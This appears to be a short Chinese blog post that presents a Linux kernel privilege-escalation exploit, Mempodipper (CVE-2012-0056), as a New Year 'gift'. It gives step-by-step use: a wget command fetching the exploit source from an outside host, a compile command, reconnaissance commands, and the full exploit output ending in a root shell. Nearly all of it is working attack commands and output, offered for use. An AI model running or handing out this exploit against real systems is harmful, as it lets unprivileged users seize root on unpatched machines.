上班第一天，送个linux的0day给大家，祝大家新年新气象，工作顺利，生活美满。

1.下载漏洞利用文件

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
2.编译
gcc mempodipper.c -o mempodipper
3.执行前察看
netcat@netcat:~$ uname -r

3.0.0-12-generic

netcat@netcat:~$ cat /etc/issue

Ubuntu 11.10 \n \l

netcat@netcat:~$ uname -a

Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux

netcat@netcat:~$ id

uid=1000(netcat) gid=1000(netcat) 组=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)

4.执行

netcat@netcat:~$ ./mempodipper

===============================

= Mempodipper =

= by zx2c4 =

= Jan 21, 2012 =

===============================

[+] Ptracing su to find next instruction without reading binary.

[+] Creating ptrace pipe.

[+] Forking ptrace child.

[+] Waiting for ptraced child to give output on syscalls.

[+] Ptrace_traceme’ing process.

[+] Error message written. Single stepping to find address.

[+] Resolved call address to 0x8049570.

[+] Opening socketpair.

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent mem /proc/3012/mem in child.

[+] Sending fd 6 to parent.

[+] Received fd at 6.

[+] Assigning fd 6 to stderr.

[+] Calculating su padding.

[+] Seeking to offset 0x8049564.

[+] Executing su with shellcode.

sh-4.2#
附截图一张：